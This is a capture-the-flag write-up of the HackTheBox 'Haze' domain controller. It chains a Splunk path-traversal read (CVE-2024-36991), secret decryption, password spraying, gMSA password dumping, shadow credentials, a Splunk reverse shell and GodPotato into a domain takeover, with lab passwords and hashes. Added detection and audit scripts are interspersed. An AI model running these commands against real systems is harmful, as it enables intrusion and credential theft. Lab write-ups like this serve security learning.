Before all

Attacker's IP: 10.10.16.5
Victim's IP: 10.10.11.61
Victim's Host: haze.htb

Suffering mask on. It's been so long since I last did an AD box that my hands are getting rusty.
RECON

Port scan

Command:

```
rustscan -a 10.10.11.61 --ulimit 5000 -- -sC -sV -Pn
```
Result:

```
Open 10.10.11.61:53
Open 10.10.11.61:88
Open 10.10.11.61:135
Open 10.10.11.61:139
Open 10.10.11.61:389
Open 10.10.11.61:445
Open 10.10.11.61:464
Open 10.10.11.61:593
Open 10.10.11.61:636
Open 10.10.11.61:3268
Open 10.10.11.61:3269
Open 10.10.11.61:5985
Open 10.10.11.61:8000
Open 10.10.11.61:8089
Open 10.10.11.61:8088
Open 10.10.11.61:9389
Open 10.10.11.61:47001
Open 10.10.11.61:49664
Open 10.10.11.61:49666
Open 10.10.11.61:49665
Open 10.10.11.61:49667
Open 10.10.11.61:49669
Open 10.10.11.61:55112
Open 10.10.11.61:55113
Open 10.10.11.61:55130
Open 10.10.11.61:55124
Open 10.10.11.61:55129
Open 10.10.11.61:55146
Open 10.10.11.61:55156
Open 10.10.11.61:62536
```
Ports 8080, 8088 and 8089 are all Splunk-related services; apart from that, this is just an ordinary Domain Controller.
Exploit

CVE-2024-36991

After some searching and testing, I found this LFI CVE:
```
┌──(kali🐳kali)-[~/ctf/hackthebox]
└─$ curl '10.10.11.61:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../var/lib/splunk/kvstore/mongo/splunk.key'
2awDpwadMi9aNpty4EGAOXBmGQWZc2b70SsaEpznjdoaFEXizvv1mca1p9v1d6KXtOLayvcHqA2igXIYYoE7pgaa

┌──(kali🐳kali)-[~/ctf/hackthebox]
└─$ curl '10.10.11.61:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/system/local/authentication.conf'
[splunk_auth]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0

[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_LDAP_Auth,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname

[authentication]
authSettings = Haze LDAP Auth
authType = LDAP
```
I also read /etc/passwd, but the hash wouldn't crack :D

References:
https://docs.splunk.com/Documentation/Splunk/9.4.1/Admin/Authenticationconf
https://community.splunk.com/t5/Knowledge-Management/How-to-resolve-issues-with-mongod-startup-such-as-quot-Failed-to/m-p/244278

Once you have the key, just dump it with splunksecrets (GitHub).
```
┌──(kali🐳kali)-[~/ctf/hackthebox]
└─$ splunksecrets splunk-decrypt --splunk-secret splunk_secret
Ciphertext: $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
Ld@p_Auth_Sp1unk@2k24
```
Got it!
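From the defender's side, the two curl requests above leave a very recognisable trace in Splunk Web's access log. The following is an added example (not from the original post) that runs a detection over constructed log lines in that shape: it normalises the request path, counts the `C:../` drive-letter traversal hops that CVE-2024-36991 relies on, and rates the finding by whether a known secret file was actually served with a 200.

```python
import re
from urllib.parse import unquote

# Constructed lines in the shape of Splunk Web's web_access.log; sample data, not a capture from the box.
SAMPLE_LOG = """\
10.10.16.5 - - [06/Aug/2024:10:00:01.000 +0000] "GET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/system/local/authentication.conf HTTP/1.1" 200 1187 "-" "curl/8.5.0" - 1ms
10.10.16.5 - - [06/Aug/2024:10:00:02.000 +0000] "GET /en-US/modules/messaging/C:../C:../C:../C:../C:../var/lib/splunk/kvstore/mongo/splunk.key HTTP/1.1" 200 90 "-" "curl/8.5.0" - 1ms
10.10.16.5 - - [06/Aug/2024:10:00:03.000 +0000] "GET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/hostname HTTP/1.1" 404 0 "-" "curl/8.5.0" - 1ms
10.10.16.9 - - [06/Aug/2024:10:00:04.000 +0000] "GET /en-US/modules/messaging/loader.js HTTP/1.1" 200 5120 "-" "Mozilla/5.0" - 2ms
"""

REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# The CVE-2024-36991 primitive: a drive-letter segment such as "C:.." survives path
# normalisation as a single component, so every "C:../" climbs one directory.
TRAVERSAL_RE = re.compile(r'(?i)[a-z]:\.\.[/\\]')
SENSITIVE_FILES = ("splunk.secret", "splunk.key", "authentication.conf", "passwd", "server.conf")

def analyse_line(line):
    """Return a finding dict for a traversal request, or None for a normal request."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    path = unquote(unquote(m.group("path")))  # normalise %-encoding, including a double-encoded "/"
    hops = TRAVERSAL_RE.findall(path)
    if not hops:
        return None
    target = next((f for f in SENSITIVE_FILES if path.lower().endswith(f)), None)
    served = m.group("status") == "200"
    return {
        "src": m.group("src"),
        "path": path,
        "hops": len(hops),
        "target": target,
        # A 200 on a known secret means the file left the box; anything else is still an attempt.
        "severity": "critical" if served and target else ("high" if served else "medium"),
    }

def scan(log_text):
    """Run analyse_line over every line and keep only the findings."""
    return [f for f in map(analyse_line, log_text.splitlines()) if f]
```

Patching to a fixed Splunk build is the real fix; this logic is for finding who read what before the patch landed.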
password spray

First, recon with enum4linux/BloodHound
```
enum4linux -u 'Paul.Taylor' -p 'Ld@p_Auth_Sp1unk@2k24' -a 10.10.11.61
```
Got another username: mark.adams

The same password logs in successfully XD
```
evil-winrm -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -i haze.htb
```
Get Shell
Privilege Escalation

gMSA write to Haze-IT-Backup

Information gathering with BloodHound:
```
bloodhound-python -c All -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -ns 10.10.11.61 --zip
```
I saw he is in the GMSA_MANAGERS group, which presumably has something to do with gMSA management?

In the evil-winrm shell: `Get-ADServiceAccount -Filter *`

Result:
```
DistinguishedName : CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
Enabled           : True
Name              : Haze-IT-Backup
ObjectClass       : msDS-GroupManagedServiceAccount
ObjectGUID        : 66f8d593-2f0b-4a56-95b4-01b326c7a780
SamAccountName    : Haze-IT-Backup$
SID               : S-1-5-21-323145914-28650650-2368316563-1111
UserPrincipalName :
```
Huh... a Haze-IT-Backup computer account?

Look with dacledit:
```
dacledit.py -target HAZE-IT-BACKUP$ -dc-ip 10.10.11.61 haze.htb/mark.adams:'Ld@p_Auth_Sp1unk@2k24'
```
In the middle there is this section:
```
[*] ACE[5] info
[*]     ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
[*]     ACE flags                 : None
[*]     Access mask               : WriteProperty
[*]     Flags                     : ACE_OBJECT_TYPE_PRESENT
[*]     Object type (GUID)        : ms-DS-GroupMSAMembership (888eedd6-ce04-df40-b462-b8a50e41ba38)
[*]     Trustee (SID)             : gMSA_Managers (S-1-5-21-323145914-28650650-2368316563-1107)
```
We have write permission on ms-DS-GroupMSAMembership:

In PowerShell, add ourselves to PrincipalsAllowedToRetrieveManagedPassword (being able to read the password essentially comes down to this attribute):
```
Set-ADServiceAccount -Identity "Haze-IT-Backup" -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"
$user = Get-ADUser -Identity "mark.adams"
Set-ADServiceAccount -Identity "Haze-IT-Backup" -PrincipalsAllowedToRetrieveManagedPassword $user.DistinguishedName
```
Finally, read it with gMSADumper.py:
```
┌──(kali🐳kali)-[~/ad-tool/gMSADumper]
└─$ python3 gMSADumper.py -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb
Users or groups who can read password for Haze-IT-Backup$:
 > mark.adams
Haze-IT-Backup$:::a70df6599d5eab1502b38f9c1c3fd828
Haze-IT-Backup$:aes256-cts-hmac-sha1-96:a455156dcce482f3ac359929b41d2f5ead1d72dd764b7f5d9f27a8c2a44a67a6
Haze-IT-Backup$:aes128-cts-hmac-sha1-96:d99b9f57ffe1a4ab867a018a99a7edab
```
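The whole escalation above hinges on one ACE: WriteProperty on ms-DS-GroupMSAMembership held by a group that is not Domain Admins. As an added example (not from the original post), this audit parses dacledit-style output for a gMSA and reports every trustee outside the built-in privileged set that can change who may retrieve the managed password, whether through that specific property GUID, an unscoped WriteProperty, or a broad right such as GenericAll. The sample ACL is constructed and models the ACE shown above; the Domain Admins entry is sample data.

```python
import re

# Constructed dacledit-style output modelled on the ACE[5] shown above; sample data, not live output.
SAMPLE_ACL = """\
[*] ACE[4] info
[*]     ACE Type                  : ACCESS_ALLOWED_ACE
[*]     ACE flags                 : None
[*]     Access mask               : FullControl
[*]     Trustee (SID)             : Domain Admins (S-1-5-21-323145914-28650650-2368316563-512)
[*] ACE[5] info
[*]     ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
[*]     ACE flags                 : None
[*]     Access mask               : WriteProperty
[*]     Flags                     : ACE_OBJECT_TYPE_PRESENT
[*]     Object type (GUID)        : ms-DS-GroupMSAMembership (888eedd6-ce04-df40-b462-b8a50e41ba38)
[*]     Trustee (SID)             : gMSA_Managers (S-1-5-21-323145914-28650650-2368316563-1107)
"""

ACE_HEADER = re.compile(r"\[\*\] ACE\[(\d+)\] info")
KEY_VALUE = re.compile(r"\[\*\]\s+(.+?)\s+:\s+(.*)")
GMSA_MEMBERSHIP_GUID = "888eedd6-ce04-df40-b462-b8a50e41ba38"
BROAD_RIGHTS = ("FullControl", "GenericAll", "GenericWrite", "WriteDACL", "WriteOwner")
# Last SID component of principals expected to hold this right: Domain Admins, Enterprise Admins,
# BUILTIN\Administrators, SYSTEM.
PRIVILEGED_RIDS = {"512", "519", "544", "18"}

def parse_aces(text):
    """Turn the '[*] ACE[n] info' sections into a list of dicts keyed by the printed field names."""
    aces, current = [], None
    for line in text.splitlines():
        header = ACE_HEADER.match(line)
        if header:
            current = {"index": int(header.group(1))}
            aces.append(current)
            continue
        kv = KEY_VALUE.match(line)
        if kv and current is not None:
            current[kv.group(1)] = kv.group(2)
    return aces

def can_write_membership(ace):
    """True if an allow ACE lets the trustee change PrincipalsAllowedToRetrieveManagedPassword."""
    if not ace.get("ACE Type", "").startswith("ACCESS_ALLOWED"):
        return False
    mask, guid = ace.get("Access mask", ""), ace.get("Object type (GUID)", "")
    broad = any(right in mask for right in BROAD_RIGHTS)
    scoped = "WriteProperty" in mask and (GMSA_MEMBERSHIP_GUID in guid or not guid)
    return broad or scoped

def trustee_rid(ace):
    sid = re.search(r"\((S-1-[\d-]+)\)", ace.get("Trustee (SID)", ""))
    return sid.group(1).rsplit("-", 1)[1] if sid else None

def audit(text):
    """(ACE index, trustee name) for every non-privileged trustee that can rewrite gMSA membership."""
    return [(ace["index"], ace["Trustee (SID)"].split(" (")[0])
            for ace in parse_aces(text)
            if can_write_membership(ace) and trustee_rid(ace) not in PRIVILEGED_RIDS]
```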
Run BloodHound once more:
```
bloodhound-python -c All -u 'Haze-IT-Backup$' --hashes ':a70df6599d5eab1502b38f9c1c3fd828' -d haze.htb -ns 10.10.11.61 --zip
```
This time we finally get a bunch of proper results... login successful.

Focus on this WriteOwner and ForceChangePassword path.

Group Abuse

shadow credential to edward.martin

The order is: make ourselves Owner -> grant ourselves GenericAll -> join Support Services -> shadow credential on edward.martin (changing the password directly ran into some policy).
```
impacket-owneredit -action write -new-owner 'Haze-IT-Backup$' -target 'SUPPORT_SERVICES' 'HAZE.HTB'/'Haze-IT-Backup$' -hashes ':a70df6599d5eab1502b38f9c1c3fd828'
bloodyAD --host "10.10.11.61" -d haze.htb -u 'Haze-IT-Backup$' -p ':a70df6599d5eab1502b38f9c1c3fd828' add genericAll 'SUPPORT_SERVICES' 'Haze-IT-Backup$'
bloodyAD --host "10.10.11.61" -d haze.htb -u 'Haze-IT-Backup$' -p ':a70df6599d5eab1502b38f9c1c3fd828' add groupMember 'SUPPORT_SERVICES' 'Haze-IT-Backup$'
pywhisker -d haze.htb -u 'Haze-IT-Backup$' -H ':a70df6599d5eab1502b38f9c1c3fd828' --target edward.martin --action "add"
```
Next, barring surprises, we get the pfx and its password and can obtain a TGT with PKINITtools; because I ran into memory issues, I set up a venv.
```
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
```
Get the TGT:
```
python3 gettgtpkinit.py 'haze.htb/edward.martin' \
  -cert-pfx /home/kali/ctf/hackthebox/1AULb1Gx.pfx \
  -pfx-pass jWzFFlzva5M4VjTrxqFC \
  edward.martin.ccache
```
Turn the TGT into an NTLM hash:
```
python3 getnthash.py 'haze.htb/edward.martin' -key c51c1189bbc0729ba582be3357eac573aa341bd38d70de0f02630014f40a9be5
```
Finally, pass the hash:
```
evil-winrm -u 'edward.martin' -H '09e0b3eeb2e7a6b0d419e9ff8f4d91af' -i 10.10.11.61
```
User GET!
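The pywhisker step above writes a key credential onto edward.martin's msDS-KeyCredentialLink, and a domain controller auditing directory changes records that as Security event 5136. As an added example (not from the original post), this detection parses such an event and flags a principal adding a key credential to an object other than its own, which is the shadow-credentials pattern, while treating a machine enrolling a key on its own computer object as normal. The event XML is constructed in the shape of the real schema; the DN of edward.martin, the hostname WS01 and the blob placeholder are assumptions.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed Security event 5136 (directory service object modified), shaped like the real
# schema. Subject/target values are sample data for this box, not a captured log; the DN of
# edward.martin is assumed.
SHADOW_CRED_EVENT = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>5136</EventID><Computer>dc01.haze.htb</Computer></System>
 <EventData>
  <Data Name="SubjectUserName">Haze-IT-Backup$</Data><Data Name="SubjectDomainName">HAZE</Data>
  <Data Name="ObjectDN">CN=edward.martin,CN=Users,DC=haze,DC=htb</Data><Data Name="ObjectClass">user</Data>
  <Data Name="AttributeLDAPDisplayName">msDS-KeyCredentialLink</Data>
  <Data Name="AttributeValue">B:[constructed length]:[constructed hex blob]:CN=edward.martin,CN=Users,DC=haze,DC=htb</Data>
  <Data Name="OperationType">%%14674</Data>
 </EventData>
</Event>"""

# Same schema, but a (constructed) workstation enrolling a key on its own computer object.
SELF_ENROL_EVENT = SHADOW_CRED_EVENT.replace("Haze-IT-Backup$", "WS01$").replace(
    "CN=edward.martin,CN=Users", "CN=WS01,CN=Computers")

def detect_key_credential_write(event_xml):
    """Return a finding for a 5136 that adds a value to msDS-KeyCredentialLink, else None."""
    root = ET.fromstring(event_xml)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "5136":
        return None
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    if data.get("AttributeLDAPDisplayName", "").lower() != "msds-keycredentiallink":
        return None
    if data.get("OperationType") != "%%14674":  # %%14674 = value added, %%14675 = value deleted
        return None
    subject = data["SubjectUserName"]
    target_cn = data["ObjectDN"].split(",")[0].removeprefix("CN=")
    # A principal writing a key credential onto some other object is the shadow-credentials
    # pattern; a machine writing onto its own computer object is ordinary device enrolment.
    self_write = subject.rstrip("$").lower() == target_cn.lower()
    return {"subject": subject, "target": data["ObjectDN"], "self_write": self_write,
            "severity": "info" if self_write else "high"}
```

Auditing "Write all properties" on user objects (SACL) is required for the DC to emit 5136 for this attribute at all.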
Checking my groups again, I found read access to the backups...
```
*Evil-WinRM* PS C:\Backups\Splunk> download splunk_backup_2024-08-06.zip
```
Dump the backup and grep for passwords:
```
cd Splunk
grep -r '\$[0-9]\$'
```
```
┌──(kali🐳kali)-[~/ctf/hackthebox]
└─$ splunksecrets splunk-legacy-decrypt -S Splunk/etc/auth/splunk.secret
Ciphertext: $1$YDz8WfhoCWmf6aTRkA+QqUI=
Sp1unkadmin@2k24
```
Got the password XD
splunk upload shell to SeImpersonatePrivilege

With the Splunk admin password, log in and follow https://github.com/TBGSecurity/splunk_shells: take the custom splunk_shells_TA_win, tweak inputs.json for the injected shell if needed, and upload it as a new service; in principle you get a reverse shell.

Run whoami to confirm privileges: SeImpersonatePrivilege is present, so the Potato family of scripts may work for privilege escalation.
```
C:\Temp>whoami /all

USER INFORMATION
----------------

User Name            SID
==================== ===========================================
haze\alexander.green S-1-5-21-323145914-28650650-2368316563-1106


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                          Attributes
========================================== ================ ============================================ ==================================================
Everyone                                   Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6                                      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0                                      Mandatory group, Enabled by default, Enabled group
HAZE\Splunk_Admins                         Group            S-1-5-21-323145914-28650650-2368316563-1108  Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1                                     Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
```
```
C:\Temp>systeminfo | findstr /B /C:"Host Name" /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Hotfix(s)"
Host Name:                 DC01
OS Name:                   Microsoft Windows Server 2022 Standard
OS Version:                10.0.20348 N/A Build 20348
System Type:               x64-based PC
Hotfix(s):                 N/A
```
The version is Windows Server 2022, so I judged GodPotato usable for escalation, and changed the Administrator password to Whale120:
```
.\exp.exe -cmd "cmd.exe /c net user Administrator Whale120"
```
Finally, log in with evil-winrm:
```
evil-winrm -u 'Administrator' -H '06dc954d32cb91ac2831d67e3e12027f' -i 10.10.11.61
```